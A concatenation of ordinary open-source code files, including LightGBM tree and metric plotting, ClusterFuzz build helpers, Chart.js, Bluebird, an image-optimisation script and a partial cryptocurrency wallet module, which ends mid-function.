If None, new figure and axes will be created.
xlim : tuple of 2 elements or None, optional (default=None)
Tuple passed to ``ax.xlim()``.
ylim : tuple of 2 elements or None, optional (default=None)
Tuple passed to ``ax.ylim()``.
title : str or None, optional (default="Metric during training")
Axes title.
If None, title is disabled.
xlabel : str or None, optional (default="Iterations")
X-axis title label.
If None, title is disabled.
ylabel : str or None, optional (default="@metric@")
Y-axis title label.
If 'auto', metric name is used.
If None, title is disabled.
@metric@ placeholder can be used, and it will be replaced with metric name.
figsize : tuple of 2 elements or None, optional (default=None)
Figure size.
dpi : int or None, optional (default=None)
Resolution of the figure.
grid : bool, optional (default=True)
Whether to add a grid for axes.
Returns
-------
ax : matplotlib.axes.Axes
The plot with metric's history over the training.
"""
if MATPLOTLIB_INSTALLED:
import matplotlib.pyplot as plt
else:
raise ImportError('You must install matplotlib and restart your session to plot metric.')
if isinstance(booster, LGBMModel):
eval_results = deepcopy(booster.evals_result_)
elif isinstance(booster, dict):
eval_results = deepcopy(booster)
elif isinstance(booster, Booster):
raise TypeError("booster must be dict or LGBMModel. To use plot_metric with Booster type, first record the metrics using record_evaluation callback then pass that to plot_metric as argument `booster`")
else:
raise TypeError('booster must be dict or LGBMModel.')
num_data = len(eval_results)
if not num_data:
raise ValueError('eval results cannot be empty.')
if ax is None:
if figsize is not None:
_check_not_tuple_of_2_elements(figsize, 'figsize')
_, ax = plt.subplots(1, 1, figsize=figsize, dpi=dpi)
if dataset_names is None:
dataset_names = iter(eval_results.keys())
elif not isinstance(dataset_names, (list, tuple, set)) or not dataset_names:
raise ValueError('dataset_names should be iterable and cannot be empty')
else:
dataset_names = iter(dataset_names)
name = next(dataset_names) # take one as sample
metrics_for_one = eval_results[name]
num_metric = len(metrics_for_one)
if metric is None:
if num_metric > 1:
_log_warning("More than one metric available, picking one to plot.")
metric, results = metrics_for_one.popitem()
else:
if metric not in metrics_for_one:
raise KeyError('No given metric in eval results.')
results = metrics_for_one[metric]
num_iteration = len(results)
max_result = max(results)
min_result = min(results)
x_ = range(num_iteration)
ax.plot(x_, results, label=name)
for name in dataset_names:
metrics_for_one = eval_results[name]
results = metrics_for_one[metric]
max_result = max(max(results), max_result)
min_result = min(min(results), min_result)
ax.plot(x_, results, label=name)
ax.legend(loc='best')
if xlim is not None:
_check_not_tuple_of_2_elements(xlim, 'xlim')
else:
xlim = (0, num_iteration)
ax.set_xlim(xlim)
if ylim is not None:
_check_not_tuple_of_2_elements(ylim, 'ylim')
else:
range_result = max_result - min_result
ylim = (min_result - range_result * 0.2, max_result + range_result * 0.2)
ax.set_ylim(ylim)
if ylabel == 'auto':
_log_warning("'auto' value of 'ylabel' argument is deprecated and will be removed in a future release of LightGBM. "
"Use '@metric@' placeholder instead.")
ylabel = '@metric@'
if title is not None:
ax.set_title(title)
if xlabel is not None:
ax.set_xlabel(xlabel)
if ylabel is not None:
ylabel = ylabel.replace('@metric@', metric)
ax.set_ylabel(ylabel)
ax.grid(grid)
return ax
def _to_graphviz(
tree_info: Dict[str, Any],
show_info: List[str],
feature_names: Union[List[str], None],
precision: Optional[int] = 3,
orientation: str = 'horizontal',
constraints: Optional[List[int]] = None,
**kwargs: Any
) -> Any:
"""Convert specified tree to graphviz instance.
See:
- https://graphviz.readthedocs.io/en/stable/api.html#digraph
"""
if GRAPHVIZ_INSTALLED:
from graphviz import Digraph
else:
raise ImportError('You must install graphviz and restart your session to plot tree.')
def add(root, total_count, parent=None, decision=None):
"""Recursively add node or edge."""
if 'split_index' in root: # non-leaf
l_dec = 'yes'
r_dec = 'no'
if root['decision_type'] == '<=':
lte_symbol = "≤"
operator = lte_symbol
elif root['decision_type'] == '==':
operator = "="
else:
raise ValueError('Invalid decision type in tree model.')
name = f"split{root['split_index']}"
if feature_names is not None:
label = f"<B>{feature_names[root['split_feature']]}</B> {operator}"
else:
label = f"feature <B>{root['split_feature']}</B> {operator} "
label += f"<B>{_float2str(root['threshold'], precision)}</B>"
for info in ['split_gain', 'internal_value', 'internal_weight', "internal_count", "data_percentage"]:
if info in show_info:
output = info.split('_')[-1]
if info in {'split_gain', 'internal_value', 'internal_weight'}:
label += f"<br/>{_float2str(root[info], precision)} {output}"
elif info == 'internal_count':
label += f"<br/>{output}: {root[info]}"
elif info == "data_percentage":
label += f"<br/>{_float2str(root['internal_count'] / total_count * 100, 2)}% of data"
fillcolor = "white"
style = ""
if constraints:
if constraints[root['split_feature']] == 1:
fillcolor = "#ddffdd" # light green
if constraints[root['split_feature']] == -1:
fillcolor = "#ffdddd" # light red
style = "filled"
label = f"<{label}>"
graph.node(name, label=label, shape="rectangle", style=style, fillcolor=fillcolor)
add(root['left_child'], total_count, name, l_dec)
add(root['right_child'], total_count, name, r_dec)
else: # leaf
name = f"leaf{root['leaf_index']}"
label = f"leaf {root['leaf_index']}: "
label += f"<B>{_float2str(root['leaf_value'], precision)}</B>"
if 'leaf_weight' in show_info:
label += f"<br/>{_float2str(root['leaf_weight'], precision)} weight"
if 'leaf_count' in show_info:
label += f"<br/>count: {root['leaf_count']}"
if "data_percentage" in show_info:
label += f"<br/>{_float2str(root['leaf_count'] / total_count * 100, 2)}% of data"
label = f"<{label}>"
graph.node(name, label=label)
if parent is not None:
graph.edge(parent, name, decision)
graph = Digraph(**kwargs)
rankdir = "LR" if orientation == "horizontal" else "TB"
graph.attr("graph", nodesep="0.05", ranksep="0.3", rankdir=rankdir)
if "internal_count" in tree_info['tree_structure']:
add(tree_info['tree_structure'], tree_info['tree_structure']["internal_count"])
else:
raise Exception("Cannot plot trees with no split")
if constraints:
# "#ddffdd" is light green, "#ffdddd" is light red
legend = """<
<TABLE BORDER="0" CELLBORDER="1" CELLSPACING="0" CELLPADDING="4">
<TR>
<TD COLSPAN="2"><B>Monotone constraints</B></TD>
</TR>
<TR>
<TD>Increasing</TD>
<TD BGCOLOR="#ddffdd"></TD>
</TR>
<TR>
<TD>Decreasing</TD>
<TD BGCOLOR="#ffdddd"></TD>
</TR>
</TABLE>
>"""
graph.node("legend", label=legend, shape="rectangle", color="white")
return graph
def create_tree_digraph(
booster: Union[Booster, LGBMModel],
tree_index: int = 0,
show_info: Optional[List[str]] = None,
precision: Optional[int] = 3,
orientation: str = 'horizontal',
**kwargs: Any
) -> Any:
"""Create a digraph representation of specified tree.
Each node in the graph represents a node in the tree.
Non-leaf nodes have labels like ``Column_10 <= 875.9``, which means
"this node splits on the feature named "Column_10", with threshold 875.9".
Leaf nodes have labels like ``leaf 2: 0.422``, which means "this node is a
leaf node, and the predicted value for records that fall into this node
is 0.422". The number (``2``) is an internal unique identifier and doesn't
have any special meaning.
.. note::
For more information please visit
https://graphviz.readthedocs.io/en/stable/api.html#digraph.
Parameters
----------
booster : Booster or LGBMModel
Booster or LGBMModel instance to be converted.
tree_index : int, optional (default=0)
The index of a target tree to convert.
show_info : list of str, or None, optional (default=None)
What information should be shown in nodes.
- ``'split_gain'`` : gain from adding this split to the model
- ``'internal_value'`` : raw predicted value that would be produced by this node if it was a leaf node
- ``'internal_count'`` : number of records from the training data that fall into this non-leaf node
- ``'internal_weight'`` : total weight of all nodes that fall into this non-leaf node
- ``'leaf_count'`` : number of records from the training data that fall into this leaf node
- ``'leaf_weight'`` : total weight (sum of hessian) of all observations that fall into this leaf node
- ``'data_percentage'`` : percentage of training data that fall into this node
precision : int or None, optional (default=3)
Used to restrict the display of floating point values to a certain precision.
orientation : str, optional (default='horizontal')
Orientation of the tree.
Can be 'horizontal' or 'vertical'.
**kwargs
Other parameters passed to ``Digraph`` constructor.
Check https://graphviz.readthedocs.io/en/stable/api.html#digraph for the full list of supported parameters.
Returns
-------
graph : graphviz.Digraph
The digraph representation of specified tree.
"""
if isinstance(booster, LGBMModel):
booster = booster.booster_
elif not isinstance(booster, Booster):
raise TypeError('booster must be Booster or LGBMModel.')
model = booster.dump_model()
tree_infos = model['tree_info']
if 'feature_names' in model:
feature_names = model['feature_names']
else:
feature_names = None
monotone_constraints = model.get('monotone_constraints', None)
if tree_index < len(tree_infos):
tree_info = tree_infos[tree_index]
else:
raise IndexError('tree_index is out of range.')
if show_info is None:
show_info = []
graph = _to_graphviz(tree_info, show_info, feature_names, precision,
orientation, monotone_constraints, **kwargs)
return graph
def plot_tree(
booster: Union[Booster, LGBMModel],
ax=None,
tree_index: int = 0,
figsize: Optional[Tuple[float, float]] = None,
dpi: Optional[int] = None,
show_info: Optional[List[str]] = None,
precision: Optional[int] = 3,
orientation: str = 'horizontal',
**kwargs: Any
) -> Any:
"""Plot specified tree.
Each node in the graph represents a node in the tree.
Non-leaf nodes have labels like ``Column_10 <= 875.9``, which means
"this node splits on the feature named "Column_10", with threshold 875.9".
Leaf nodes have labels like ``leaf 2: 0.422``, which means "this node is a
leaf node, and the predicted value for records that fall into this node
is 0.422". The number (``2``) is an internal unique identifier and doesn't
have any special meaning.
.. note::
It is preferable to use ``create_tree_digraph()`` because of its lossless quality
and returned objects can be also rendered and displayed directly inside a Jupyter notebook.
Parameters
----------
booster : Booster or LGBMModel
Booster or LGBMModel instance to be plotted.
ax : matplotlib.axes.Axes or None, optional (default=None)
Target axes instance.
If None, new figure and axes will be created.
tree_index : int, optional (default=0)
The index of a target tree to plot.
figsize : tuple of 2 elements or None, optional (default=None)
Figure size.
dpi : int or None, optional (default=None)
Resolution of the figure.
show_info : list of str, or None, optional (default=None)
What information should be shown in nodes.
- ``'split_gain'`` : gain from adding this split to the model
- ``'internal_value'`` : raw predicted value that would be produced by this node if it was a leaf node
- ``'internal_count'`` : number of records from the training data that fall into this non-leaf node
- ``'internal_weight'`` : total weight of all nodes that fall into this non-leaf node
- ``'leaf_count'`` : number of records from the training data that fall into this leaf node
- ``'leaf_weight'`` : total weight (sum of hessian) of all observations that fall into this leaf node
- ``'data_percentage'`` : percentage of training data that fall into this node
precision : int or None, optional (default=3)
Used to restrict the display of floating point values to a certain precision.
orientation : str, optional (default='horizontal')
Orientation of the tree.
Can be 'horizontal' or 'vertical'.
**kwargs
Other parameters passed to ``Digraph`` constructor.
Check https://graphviz.readthedocs.io/en/stable/api.html#digraph for the full list of supported parameters.
Returns
-------
ax : matplotlib.axes.Axes
The plot with single tree.
"""
if MATPLOTLIB_INSTALLED:
import matplotlib.image as image
import matplotlib.pyplot as plt
else:
raise ImportError('You must install matplotlib and restart your session to plot tree.')
if ax is None:
if figsize is not None:
_check_not_tuple_of_2_elements(figsize, 'figsize')
_, ax = plt.subplots(1, 1, figsize=figsize, dpi=dpi)
graph = create_tree_digraph(booster=booster, tree_index=tree_index,
show_info=show_info, precision=precision,
orientation=orientation, **kwargs)
s = BytesIO()
s.write(graph.pipe(format='png'))
s.seek(0)
img = image.imread(s)
ax.imshow(img)
ax.axis('off')
return ax
|
from PySimultan import DataModel, Template, yaml
from src.PYSimultanRadiation import TemplateParser
from src.PYSimultanRadiation.geometry.scene import Scene
import os
from src.PYSimultanRadiation.config import config
import logging
logger = logging.getLogger('PySimultanRadiation')
logger.setLevel('INFO')
logger2 = logging.getLogger('PySimultan')
logger2.setLevel('INFO')
config.default_mesh_size = 1
def create_geometry_templates():
building_template = Template(template_name='Building',
template_id='102',
content=['Zones', 'Usage', 'Constructions'],
documentation='',
units={},
types={},
slots={'Zones': 'Liste_00',
'Aufbauzuweisungen': 'Liste_01',
'TGA': 'Liste_03',
'Nutzung': 'Liste_04'}
)
return [building_template]
def run_example():
templates = create_geometry_templates()
with open(r'F:\OneDrive\PythonProjects\SmartCampusRadiation\test\output\smart_campus_template.yml',
mode='w',
encoding="utf-8") as f_obj:
yaml.dump(templates, f_obj)
template_file = r'F:\OneDrive\PythonProjects\SmartCampusRadiation\test\output\smart_campus_template.yml'
project_file = r'F:\OneDrive\PythonProjects\SmartCampusRadiation\resources\SMART_CAMPUS_TU_WIEN_BIBLIOTHEK_2020.03.22_richtig_RAUMMODELL.simultan'
if not os.path.isfile(project_file):
raise FileExistsError(f'File {project_file} does not exist')
template_parser = TemplateParser(template_filepath=template_file)
data_model = DataModel(project_path=project_file)
typed_data = data_model.get_typed_data(template_parser=template_parser, create_all=True)
geo_model = template_parser.typed_geo_models[123]
my_scene = Scene(vertices=geo_model.vertices,
edges=geo_model.edges,
edge_loops=geo_model.edge_loops,
faces=geo_model.faces,
volumes=geo_model.volumes,
terrain_height=14.2)
# my_scene.export_shading_analysis_mesh('shading_analysis_mesh.vtk')
my_scene.export_shading_analysis_mesh('shading_analysis_mesh_fine.vtk', mesh_size=1)
my_scene.volumes[0].mesh
my_scene.add_terrain()
my_scene.terrain.export_vtk('terrain.vtk')
# terrain = my_scene.generate_terrain()
# terrain.mesh.write('terrain.vtk')
sky = my_scene.generate_sky()
sky.mesh.write('sky.vtk')
# my_scene.create_topology()
# surf_mesh_10 = my_scene.faces[10].mesh
scene_surface_mesh = my_scene.surface_mesh
scene_surface_mesh.write('scene.vtk')
# for volume in my_scene.volumes:
# surf_mesh = volume.surface_mesh
# print(surf_mesh)
# if surf_mesh is not None:
# surf_mesh.write('test_surf.vtk')
#
# for volume in my_scene.volumes:
# vol_mesh = volume.mesh
# print(vol_mesh)
# if vol_mesh is not None:
# vol_mesh.write('test_vol.vtk')
#
# surf_mesh_5 = my_scene.volumes[5].surface_mesh
# print(surf_mesh_5)
#
# print(my_scene.windows)
#
# scene_mesh = my_scene.mesh
# my_scene.export_surf_mesh('test.vtk')
# for face in my_scene.faces:
# filename = "F:\\OneDrive\\PythonProjects\\SmartCampusRadiation\\test\\output\\" + face.name + '.vtk'
# my_scene.export_face_mesh_vtk(face, filename)
# for face in my_scene.faces:
# mesh = face.mesh
print('done')
if __name__ == '__main__':
run_example()
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""common.py contains common methods and variables that are used by multiple
commands."""
import datetime
import io
import os
import platform
import shutil
import subprocess
import sys
import tempfile
import urllib.request
import zipfile
from distutils import dir_util
from local.butler import constants
try:
from shlex import quote
except ImportError:
from pipes import quote
INVALID_FILENAMES = ['src/third_party/setuptools/script (dev).tmpl']
class GcloudError(Exception):
"""Gcloud error."""
class GsutilError(Exception):
"""Gsutil error."""
class Gcloud(object):
"""Project specific gcloud."""
def __init__(self, project_id):
self.project_id = project_id
def run(self, *args):
arguments = ['gcloud', '--project=' + self.project_id]
arguments.extend(args)
return _run_and_handle_exception(arguments, GcloudError)
class Gsutil(object):
"""gsutil runner."""
def run(self, *args):
arguments = ['gsutil']
arguments.extend(args)
return _run_and_handle_exception(arguments, GsutilError)
def _run_and_handle_exception(arguments, exception_class):
"""Run a command and handle its error output."""
print('Running:', ' '.join(quote(arg) for arg in arguments))
try:
return subprocess.check_output(arguments)
except subprocess.CalledProcessError as e:
raise exception_class(e.output)
def _utcnow():
"""We need this method for mocking."""
return datetime.datetime.utcnow()
def compute_staging_revision():
"""Staging revision adds 2 days to timestamp and append 'staging'."""
return _compute_revision(_utcnow() + datetime.timedelta(days=2), 'staging')
def compute_prod_revision():
"""Get prod revision."""
return _compute_revision(_utcnow())
def _compute_revision(timestamp, *extras):
"""Return a revision that contains a timestamp, git-sha, user, and
is_staging. The ordinality of revision is crucial for updating source code.
Later revision *must* be greater than earlier revision. See:
crbug.com/674173."""
timestamp = timestamp.strftime('%Y%m%d%H%M%S-utc')
_, git_sha = execute('git rev-parse --short HEAD')
git_sha = git_sha.strip().decode('utf-8')
components = [timestamp, git_sha, os.environ['USER']] + list(extras)
return '-'.join(components)
def process_proc_output(proc, print_output=True):
"""Print output of process line by line. Returns the whole output."""
def _print(s):
if print_output:
print(s)
lines = []
for line in iter(proc.stdout.readline, b''):
_print('| %s' % line.rstrip().decode('utf-8'))
lines.append(line)
return b''.join(lines)
def execute_async(command, extra_environments=None, cwd=None):
"""Execute a bash command asynchronously. Returns a subprocess.Popen."""
environments = os.environ.copy()
if extra_environments is not None:
environments.update(extra_environments)
return subprocess.Popen(
command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=environments,
cwd=cwd)
def execute(command,
print_output=True,
exit_on_error=True,
extra_environments=None,
cwd=None):
"""Execute a bash command."""
def _print(s):
if print_output:
print(s)
print_string = 'Running: %s' % command
if cwd:
print_string += " (cwd='%s')" % cwd
_print(print_string)
proc = execute_async(command, extra_environments, cwd=cwd)
output = process_proc_output(proc, print_output)
proc.wait()
if proc.returncode != 0:
_print('| Return code is non-zero (%d).' % proc.returncode)
if exit_on_error:
_print('| Exit.')
sys.exit(proc.returncode)
return (proc.returncode, output)
def kill_process(name):
"""Kill the process by its name."""
plt = get_platform()
if plt == 'windows':
execute(
'wmic process where (commandline like "%%%s%%") delete' % name,
exit_on_error=False)
elif plt in ['linux', 'macos']:
execute('pkill -KILL -f "%s"' % name, exit_on_error=False)
def is_git_dirty():
"""Check if git is dirty."""
_, output = execute('git status --porcelain')
return output
def get_chromedriver_path():
"""Return path to chromedriver binary."""
if get_platform() == 'windows':
chromedriver_binary = 'chromedriver.exe'
binary_directory = 'Scripts'
else:
chromedriver_binary = 'chromedriver'
binary_directory = 'bin'
return os.path.join(os.environ['ROOT_DIR'], 'ENV', binary_directory,
chromedriver_binary)
def _install_chromedriver():
"""Install the latest chromedriver binary in the virtualenv."""
# Download a file containing the version number of the latest release.
version_request = urllib.request.urlopen(constants.CHROMEDRIVER_VERSION_URL)
version = version_request.read().decode()
plt = get_platform()
if plt == 'linux':
archive_name = 'chromedriver_linux64.zip'
elif plt == 'macos':
archive_name = 'chromedriver_mac64.zip'
elif plt == 'windows':
archive_name = 'chromedriver_win32.zip'
archive_request = urllib.request.urlopen(
constants.CHROMEDRIVER_DOWNLOAD_PATTERN.format(
version=version, archive_name=archive_name))
archive_io = io.BytesIO(archive_request.read())
chromedriver_archive = zipfile.ZipFile(archive_io)
chromedriver_path = get_chromedriver_path()
output_directory = os.path.dirname(chromedriver_path)
chromedriver_binary = os.path.basename(chromedriver_path)
chromedriver_archive.extract(chromedriver_binary, output_directory)
os.chmod(chromedriver_path, 0o750)
print('Installed chromedriver at: %s' % chromedriver_path)
def _pip():
"""Get the pip binary name."""
return 'pip3'
def _install_pip(requirements_path, target_path):
"""Perform pip install using requirements_path onto target_path."""
if os.path.exists(target_path):
shutil.rmtree(target_path)
execute(
'{pip} install -r {requirements_path} --upgrade --target {target_path}'.
format(
pip=_pip(),
requirements_path=requirements_path,
target_path=target_path))
def _install_platform_pip(requirements_path, target_path, platform_name):
"""Install platform specific pip packages."""
pip_platform = constants.PLATFORMS.get(platform_name)
if not pip_platform:
raise Exception('Unknown platform: %s.' % platform_name)
# Some platforms can specify multiple pip platforms (e.g. macOS has multiple
# SDK versions).
if isinstance(pip_platform, str):
pip_platforms = (pip_platform,)
else:
assert isinstance(pip_platform, tuple)
pip_platforms = pip_platform
pip_abi = constants.ABIS[platform_name]
for pip_platform in pip_platforms:
temp_dir = tempfile.mkdtemp()
return_code, _ = execute(
'{pip} download --no-deps --only-binary=:all: --platform={platform} '
'--abi={abi} -r {requirements_path} -d {output_dir}'.format(
pip=_pip(),
platform=pip_platform,
abi=pip_abi,
requirements_path=requirements_path,
output_dir=temp_dir),
exit_on_error=False)
if return_code != 0:
print('Did not find package for platform: ' + pip_platform)
continue
execute('unzip -o -d %s \'%s/*.whl\'' % (target_path, temp_dir))
shutil.rmtree(temp_dir, ignore_errors=True)
break
if return_code != 0:
raise Exception('Failed to find package in supported platforms: %s' +
str(pip_platforms))
def _remove_invalid_files():
"""Remove invalid file whose filename is invalid to appengine."""
for name in INVALID_FILENAMES:
if os.path.exists(name):
os.remove(name)
def install_dependencies(platform_name=None, is_reproduce_tool_setup=False):
"""Install dependencies for bots."""
_install_pip('src/requirements.txt', 'src/third_party')
if platform_name:
_install_platform_pip(
'src/platform_requirements.txt',
'src/third_party',
platform_name=platform_name)
with tempfile.NamedTemporaryFile() as f:
f.write(open('src/requirements.txt', 'rb').read())
f.write(open('src/appengine/requirements.txt', 'rb').read())
f.flush()
_install_pip(f.name, 'src/appengine/third_party')
# Only the previous dependencies are needed for reproduce tool installation.
if is_reproduce_tool_setup:
return
_remove_invalid_files()
execute('bower install --allow-root')
_install_chromedriver()
def remove_symlink(target):
"""Removes a symlink."""
if not os.path.exists(target):
return
if os.path.isdir(target) and get_platform() == 'windows':
os.rmdir(target)
else:
os.remove(target)
def symlink(src, target):
"""Create the target to link to the src."""
src = os.path.abspath(src)
target = os.path.abspath(target)
remove_symlink(target)
if get_platform() == 'windows':
execute(r'cmd /c mklink /j %s %s' % (target, src))
else:
os.symlink(src, target)
assert os.path.exists(target), (
'Failed to create {target} symlink for {src}.'.format(
target=target, src=src))
print('Created symlink: source: {src}, target {target}.'.format(
src=src, target=target))
def copy_dir(src, target):
"""Copy directory."""
if os.path.exists(target):
shutil.rmtree(target, ignore_errors=True)
shutil.copytree(src, target)
def has_file_in_path(filename):
"""Check to see if filename exists in the user's PATH."""
path = os.getenv('PATH')
for path_component in path.split(':'):
if os.path.isfile(os.path.join(path_component, filename)):
return True
return False
def test_bucket(env_var):
"""Get the integration test bucket."""
bucket = os.getenv(env_var)
if not bucket:
raise RuntimeError(
'You need to specify {var} for integration testing'.format(var=env_var))
return bucket
def kill_leftover_emulators():
"""Kill leftover instances of cloud emulators and dev_appserver."""
kill_process('dev_appserver.py')
kill_process('CloudDatastore.jar')
kill_process('pubsub-emulator')
kill_process('run_bot')
def get_platform():
"""Get the platform."""
if platform.system() == 'Linux':
return 'linux'
if platform.system() == 'Darwin':
return 'macos'
if platform.system() == 'Windows':
return 'windows'
raise Exception('Unknown platform: %s.' % platform.system())
def update_dir(src_dir, dst_dir):
"""Recursively copy from src_dir to dst_dir, replacing files but only if
they're newer or don't exist."""
dir_util.copy_tree(src_dir, dst_dir, update=True)
|
"""
redisimp - redis import tool
"""
from .api import * # noqa
from .multi import * # noqa
from .cli import * # noqa
from .version import __version__ # noqa
|
import DoughnutController from './controller.doughnut';
import defaults from '../core/core.defaults';
import {clone} from '../helpers/helpers.core';
defaults.set('pie', clone(defaults.doughnut));
defaults.set('pie', {
cutoutPercentage: 0
});
// Pie charts are Doughnut chart with different defaults
export default DoughnutController;
|
/* eslint-disable import/no-unresolved,node/no-missing-import,node/no-extraneous-import */
import imagemin from 'imagemin';
import imageminOptipng from 'imagemin-optipng';
import imageminPngquant from 'imagemin-pngquant';
const options = {};
options.plugins = [];
options.plugins.push(
imageminPngquant({
speed: 2,
quality: [0.1, 0.2],
verbose: true,
}),
imageminOptipng({
optimizationLevel: 7,
}),
);
const baseDirectory = `public/static/images`;
const directories = [
'home',
// 'create-collective',
];
for (const directory of directories) {
imagemin([`${baseDirectory}/${directory}/original/joinus*.png`], {
...options,
destination: `${baseDirectory}/${directory}`,
}).then(files => {
console.log(`${baseDirectory}/${directory}/original/*.png was optimized, ${files.length} files`);
});
}
|
/**
* Copyright (c) 2013 Petka Antonov
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:</p>
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
"use strict";
module.exports = function(Promise, Promise$_All, PromiseArray) {
var SettledPromiseArray = require("./settled_promise_array.js")(
Promise, PromiseArray);
function Promise$_Settle(promises, useBound, caller) {
return Promise$_All(
promises,
SettledPromiseArray,
caller,
useBound === true ? promises._boundTo : void 0
).promise();
}
Promise.settle = function Promise$Settle(promises) {
return Promise$_Settle(promises, false, Promise.settle);
};
Promise.prototype.settle = function Promise$settle() {
return Promise$_Settle(this, true, this.settle);
};
};
|
import triplesec from "triplesec";
import PouchDB from "pouchdb";
import vsys from "@virtualeconomy/js-v-sdk";
import converters from "../utils/converters";
import { get_currency_by_country_code } from "../utils/currency";
import base58 from "base-58";
import { clean_json_text } from "../utils/json";
import get_browser_locales from "../utils/locales";
import { NODES_IP, CURRENCIES, LANGUAGES } from "../utils/constants";
/* VSYS SETUP */
const constants = vsys.constants;
let selected_node = NODES_IP[0];
const network_byte = constants.MAINNET_BYTE;
let chain = new vsys.Blockchain(selected_node, network_byte);
const TX_TYPE = 2; // Send / receive transactions
/* DB */
const query_db = new PouchDB("query_db", {revs_limit: 1, auto_compaction: true});
const accounts_db = new PouchDB("accounts_db", {revs_limit: 1, auto_compaction: true});
/*const logged_accounts_db = new PouchDB("logged_accounts_db", {revs_limit: 1, auto_compaction: true});*/
const all_settings_db = new PouchDB("all_settings_db", {revs_limit: 1, auto_compaction: true});
let logged_account = null;
let all_settings = null;
function _load_settings_locales() {
// Get browser locales
const locales = get_browser_locales({language_code_only: false});
// Default locales are english but if the browser is set to a langue below it will set the locales if it is part of the list
if(typeof locales !== "undefined") {
let language = "en";
let currency = "usd";
let country = "usa";
// Get locales from the end, the first will be set last
for(let i = locales.length-1; i >= 0; i--) {
// Get "en-US" like ["en","US"]
const locale = locales[i];
const locale_array = locale.split("-");
if(locale_array.length == 2) {
// Set both language and country
language = locale_array[0].toLowerCase();
country = locale_array[1].toUpperCase();
}else {
// Use locales like "en" only if L. like "en-US" doesn't exist
if(country == "") {
language = locale_array[0].toLowerCase();
}
}
}
currency = get_currency_by_country_code(country).toLowerCase();
return {
selected_language: language,
selected_currency: currency
};
}
}
function _loadJSON(url, callback_function) {
let data_file = url;
let http_request = new XMLHttpRequest();
try{
// Opera 8.0+, Firefox, Chrome, Safari
http_request = new XMLHttpRequest();
}catch (e) {
// Internet Explorer Browsers
try{
http_request = new ActiveXObject("Msxml2.XMLHTTP");
}catch (e) {
try{
http_request = new ActiveXObject("Microsoft.XMLHTTP");
}catch (e) {
// Something went wrong
callback_function(null);
}
}
}
http_request.onreadystatechange = function() {
if (http_request.readyState == 4 ) {
// Javascript function JSON.parse to parse JSON data
let jsonObj = JSON.parse(http_request.responseText);
callback_function(jsonObj);
}
}
http_request.open("GET", data_file, true);
http_request.send();
}
function _makeId(length) {
let result = "";
const characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+*%&/()=?!$";
const charactersLength = characters.length;
for ( var i = 0; i < length; i++ ) {
result += characters.charAt(Math.floor(Math.random() * charactersLength));
}
return result;
}
function _format_amount(amount) {
const amount_scaled = amount / 100000000;
const amount_rounded = Math.round(amount_scaled * 100) / 100
const amount_fixed_two = amount_rounded .toFixed(2);
return amount_fixed_two;
}
function _format_attachment(attachment) {
const attachment_bytes = base58.decode(attachment);
return converters.byteArrayToString(attachment_bytes);
}
function _format_transaction(transaction) {
const formated_transaction = {
id: transaction.id,
fee: _format_amount(transaction.feeCharged),
timestamp: transaction.timestamp / 1000000,
sender: transaction.proofs[0].address,
recipient: transaction.recipient,
amount: _format_amount(transaction.amount),
memo: _format_attachment(transaction.attachment)
};
return formated_transaction;
}
function _merge_object(obj1, obj2){
let merged_object = obj1 || {};
for (let attrname in obj2) {
if(typeof obj2[attrname] !== "undefined") {
merged_object[attrname] = obj2[attrname];
}
}
return merged_object;
}
function get_settings(callback_function) {
if(all_settings !== null) {
callback_function(all_settings);
}
function cache_callback_function(error, response) {
let doc_valid = false;
let all_docs_query_error = false;
if(!error) {
// Get settings docs
const settings = response.rows.map(function (row) {
return row.doc;
});
// Choose the first
if(typeof settings[0] !== "undefined") {
if(settings[0].data !== "undefined") {
const setting = JSON.parse(settings[0].data);
if(typeof setting.selected_node !== "undefined") {
doc_valid = true;
all_settings = _merge_object(all_settings, setting);
selected_node = all_settings.selected_node;
callback_function(all_settings);
}
}
// Delete all others
for(let i = 1; i < settings.length; i++) {
all_settings_db.remove(settings[i]);
}
}
}else {
all_docs_query_error = true;
}
// Create new
if(!doc_valid || all_docs_query_error) {
all_settings = {
explorer_address: "https://explorer.v.systems/address",
selected_node: selected_node,
sfx_enabled: false,
vocal_enabled: false,
selected_currency: "usd",
selected_language: "en"
};
all_settings = _merge_object(all_settings, _load_settings_locales());
all_settings_db.post({
data: JSON.stringify(all_settings)
});
selected_node = all_settings.selected_node;
callback_function(all_settings);
}
}
all_settings_db.allDocs({
include_docs: true
}, cache_callback_function);
}
function set_settings(settings, callback_function) {
let all_setting_doc = null;
if(typeof settings.selected_node !== "undefined") { selected_node = settings.selected_node }
function cache_callback_function(error, response) {
if(!error) {
// Get settings docs
const settings_docs = response.rows.map(function (row) {
return row.doc;
});
// Choose the first
if(typeof settings_docs[0] !== "undefined") {
if(settings_docs[0].data !== "undefined") {
const setting = JSON.parse(settings_docs[0].data);
if(typeof setting.selected_node !== "undefined") {
all_setting_doc = settings_docs[0];
}
}
// Delete all others
for(let i = 1; i < settings_docs.length; i++) {
all_settings_db.remove(settings_docs[i]);
}
}
}
// Create new
if(!all_setting_doc) {
const default_all_settings = {
